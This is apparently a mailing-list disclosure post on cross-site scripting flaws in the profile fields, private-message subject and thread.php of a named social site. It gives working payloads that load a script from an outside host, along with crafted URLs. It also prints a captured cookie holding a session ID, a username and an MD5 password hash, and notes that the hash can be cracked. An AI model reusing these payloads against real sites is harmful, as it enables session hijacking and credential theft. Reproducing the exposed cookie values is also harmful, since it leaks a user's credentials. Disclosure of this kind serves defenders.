<<< Date Index >>>     <<< Thread Index >>>

Yourfacesucks.com - XSS & cookie disclosure



Yourfacesucks.com

Homepage:
http://www.yourfacesucks.com

Effected files:

music/video input boxes in editing profile
subject box of sending a PM
thread.php

---------------------------------------

XSS Vuln with cookie disclosure in profile input boxes:

No filter evasion needed here. For PoC try putting <SCRIPT 
SRC=http://ha.youfucktard.com/xss.js></SCRIPT> in Music/Video input box.

And the cookie data we see is:
This is remote text via xss.js located at youfucktard.com 
PHPSESSID=bdee69f9a82b5333bc365f01447b8afc; db_user=luny666; loggedin=1; 
status=0; sessuid=18304; md5pass=91da4589b012c2fe1ceac1fb2363dbc6; 
onlineid=274562 


Breaking down our cookie:
PHPSESSID = (Our php session ID)

db_user= (Our username)

loggedin= (Logged in:yes)

staus=0 (Probably means our profile has not been approved yet

sessuid = (Session userid)

md5pass= (md5 hash of our password)

onlineid= (Our userid #)

So, now we know our username (luny666) and our password hash, which can easily 
be cracked.

Screenshots:
http://www.youfucktard.com/xsp/facesucks1.jpg
http://www.youfucktard.com/xsp/facesucks2.jpg

----------------------------------------------

Sending PM's XSS Vuln:

No filter evasion needed,in the subject box put:
<IMG SRC=javascript:alert('XSS')>

Screenshot:
http://www.youfucktard.com/xsp/facesucks3.jpg

----------------------------------------------

Viewing threads on thread.php:

Escaping quotes with a few empty tags try putting this for a PoC

Viewing the forum (The whole page fills with this vuln, got about 25 popups 
with this):

http://www.yourfacesucks.com/forums/thread.php?forumid=15";>">">">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<<"">


Viewing a specific thread in the forum:

http://www.yourfacesucks.com/forums/thread.php?forumid=15&threadid=51713";>">">">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<<"">